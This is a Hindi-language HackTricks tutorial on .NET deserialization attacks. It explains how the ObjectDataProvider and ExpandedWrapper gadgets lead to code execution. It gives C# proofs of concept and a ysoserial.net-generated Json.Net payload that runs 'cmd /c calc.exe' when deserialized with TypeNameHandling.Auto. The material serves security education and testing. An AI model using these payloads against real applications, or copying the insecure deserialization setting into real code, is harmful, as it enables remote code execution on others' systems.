# बेसिक .Net डिसीरियलाइज़ेशन (ObjectDataProvider गैजेट, ExpandedWrapper, और Json.Net)
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 * क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।** * **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपना योगदान दें।**
इस पोस्ट का उद्देश्य है **समझना कि ObjectDataProvider गैजेट कैसे उपयोग किया जाता है** ताकि RCE प्राप्त किया जा सके और **Serialization पुस्तकालय Json.Net और xmlSerializer का दुरुपयोग कैसे किया जा सकता है** उस गैजेट के साथ। ## ObjectDataProvider गैजेट दस्तावेज़ीकरण से: _ObjectDataProvider कक्षा एक ऑब्जेक्ट को लपेटती है और बाइंडिंग स्रोत के रूप में उपयोग करने के लिए एक ऑब्जेक्ट बनाती है_।\ हाँ, यह एक अजीब समझ है, इसलिए चलो देखते हैं कि इस कक्षा में क्या है जो इतना दिलचस्प है: यह कक्षा एक विषम ऑब्जेक्ट को **लपेटने की अनुमति देती है**, _**MethodParameters**_ का उपयोग करके **विषम पैरामीटर सेट करने** के लिए और फिर **MethodName का उपयोग करके विषम ऑब्जेक्ट के विषम फ़ंक्शन को कॉल करने के लिए**।\ इसलिए, विषम **ऑब्जेक्ट** डिसीरियलाइज़ होते समय एक **फ़ंक्शन** को **पैरामीटर के साथ निष्पादित** करेगा। ### **यह कैसे संभव है** ObjectDataProvider को **System.Windows.Data** नामक नेमस्पेस में परिभाषित और लागू किया गया है, जो **PresentationFramework.dll** में स्थित है (_C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF_). [**dnSpy**](https://github.com/0xd4d/dnSpy) का उपयोग करके आप इंटरेस्टेड कक्षा के कोड की **जांच** कर सकते हैं। नीचे दी गई छवि में हम **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name** के कोड को देख रहे हैं ![](<../../.gitbook/assets/image (299).png>) जैसा कि आप देख सकते हैं जब `MethodName` सेट होता है तो `base.Refresh()` को कॉल किया जाता है, चलो देखते हैं कि यह क्या करता है: ![](<../../.gitbook/assets/image (300).png>) ठीक है, चलो देखते हैं कि `this.BeginQuery()` क्या करता है। `BeginQuery` को `ObjectDataProvider` द्वारा ओवरराइड किया गया है और यह क्या करता है: ![](<../../.gitbook/assets/image (301).png>) कोड के अंत में ध्यान दें कि यह `this.QueryWorke(null)` को कॉल कर रहा है। चलो देखते हैं कि यह क्या निष्पादित करता है: ![](<../../.gitbook/assets/image (302) (1).png>) ध्यान दें कि यह फ़ंक्शन `QueryWorker` का पूरा कोड नहीं है लेकिन यह इसका दिलचस्प हिस्सा दिखा रहा है: कोड **`this.InvokeMethodOnInstance(out ex);` को कॉल करता है** यह वह लाइन है जहां **सेट किया गया मेथड निष्पादित** होता है। यदि आप यह सत्यापित करना चाहते हैं कि _**MethodName**_ सेट करने पर यह निष्पादित होगा, तो आप इस कोड को चला सकते हैं: ```java using System.Windows.Data; using System.Diagnostics; namespace ODPCustomSerialExample { class Program { static void Main(string[] args) { ObjectDataProvider myODP = new ObjectDataProvider(); myODP.ObjectType = typeof(Process); myODP.MethodParameters.Add("cmd.exe"); myODP.MethodParameters.Add("/c calc.exe"); myODP.MethodName = "Start"; } } } ``` नोट करें कि आपको `System.Windows.Data` लोड करने के लिए _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ को संदर्भ में जोड़ना होगा। ## ExpandedWrapper पिछले उत्पादन का उपयोग करके ऐसे मामलों में होगा जहां **ऑब्जेक्ट** को **_ObjectDataProvider_** के रूप में **डिसीरियलाइज़ किया जाएगा** (उदाहरण के लिए DotNetNuke vuln में, XmlSerializer का उपयोग करके ऑब्जेक्ट को `GetType` का उपयोग करके डिसीरियलाइज़ किया गया था)। फिर, _ObjectDataProvider_ इंस्टेंस में **छिपे ऑब्जेक्ट के प्रकार के बारे में कोई ज्ञान नहीं होगा** (`Process` उदाहरण के लिए)। आप यहां [DotNetNuke vuln के बारे में अधिक जानकारी देख सकते हैं](https://translate.google.com/translate?hl=en\&sl=auto\&tl=en\&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F\&sandbox=1)। यह कक्षा एक दिए गए इंस्टेंस में छिपे ऑब्जेक्टों के ऑब्जेक्ट प्रकार को निर्दिष्ट करने की अनुमति देती है। इसलिए, इस कक्षा का उपयोग एक स्रोत ऑब्जेक्ट (_ObjectDataProvider_) को एक नए ऑब्जेक्ट प्रकार में छिपाने और हमें आवश्यक गुण (_ObjectDataProvider.MethodName_ और _ObjectDataProvider.MethodParameters_) प्रदान करने के लिए किया जा सकता है।\ यह पहले प्रस्तुत किए गए मामलों के लिए बहुत उपयोगी होता है, क्योंकि हम **_ObjectDataProvider_** को **_ExpandedWrapper_** इंस्टेंस के भीतर **छिपा सकते हैं** और जब डिसीरियलाइज़ किया जाएगा तो यह कक्षा _**MethodName**_ में निर्दिष्ट **कार्य** को **निष्पादित** करने वाला _**OjectDataProvider**_ ऑब्जेक्ट बनाएगी। आप निम्नलिखित कोड के साथ इस व्रैपर की जांच कर सकते हैं: ```java using System.Windows.Data; using System.Diagnostics; using System.Data.Services.Internal; namespace ODPCustomSerialExample { class Program { static void Main(string[] args) { ExpandedWrapper myExpWrap = new ExpandedWrapper(); myExpWrap.ProjectedProperty0 = new ObjectDataProvider(); myExpWrap.ProjectedProperty0.ObjectInstance = new Process(); myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe"); myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe"); myExpWrap.ProjectedProperty0.MethodName = "Start"; } } } ``` ## Json.Net [आधिकारिक वेब पेज](https://www.newtonsoft.com/json) में इसका उल्लेख किया गया है कि यह पुस्तकालय **Json.NET के शक्तिशाली JSON सीरियलाइज़र के साथ किसी भी .NET ऑब्जेक्ट को सीरियलाइज़ और डीसीरियलाइज़ करने की अनुमति देती है**। इसलिए, यदि हम **ObjectDataProvider गैजेट को डीसीरियलाइज़ कर सकें**, तो हम एक ऑब्जेक्ट को डीसीरियलाइज़ करके एक **RCE** का कारण कर सकते हैं। ### Json.Net उदाहरण सबसे पहले चलिए देखते हैं कि इस पुस्तकालय का उपयोग करके एक ऑब्जेक्ट को **सीरियलाइज़/डीसीरियलाइज़** कैसे किया जाता है: ```java using System; using Newtonsoft.Json; using System.Diagnostics; using System.Collections.Generic; namespace DeserializationTests { public class Account { public string Email { get; set; } public bool Active { get; set; } public DateTime CreatedDate { get; set; } public IList Roles { get; set; } } class Program { static void Main(string[] args) { Account account = new Account { Email = "james@example.com", Active = true, CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc), Roles = new List { "User", "Admin" } }; //Serialize the object and print it string json = JsonConvert.SerializeObject(account); Console.WriteLine(json); //{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]} //Deserialize it Account desaccount = JsonConvert.DeserializeObject(json); Console.WriteLine(desaccount.Email); } } } ``` ### Json.Net का दुरुपयोग [ysoserial.net](https://github.com/pwntester/ysoserial.net) का उपयोग करके मैंने एक अपशिष्ट बनाया है: ```java ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe" { '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd', '/c calc.exe'] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} } ``` इस कोड में आप **एक्सप्लॉइट का परीक्षण कर सकते हैं**, इसे चलाएं और आप देखेंगे कि एक कैल्क चलाया जाता है: ```java using System; using System.Text; using Newtonsoft.Json; namespace DeserializationTests { class Program { static void Main(string[] args) { //Declare exploit string userdata = @"{ '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd', '/c calc.exe'] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} }"; //Exploit to base64 string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata)); //Get data from base64 byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64); //Deserialize data string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64); object obj = JsonConvert.DeserializeObject(userdata_decoded, new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.Auto }); } } } ```
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **फॉलो** करें या **Twitter** पर [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।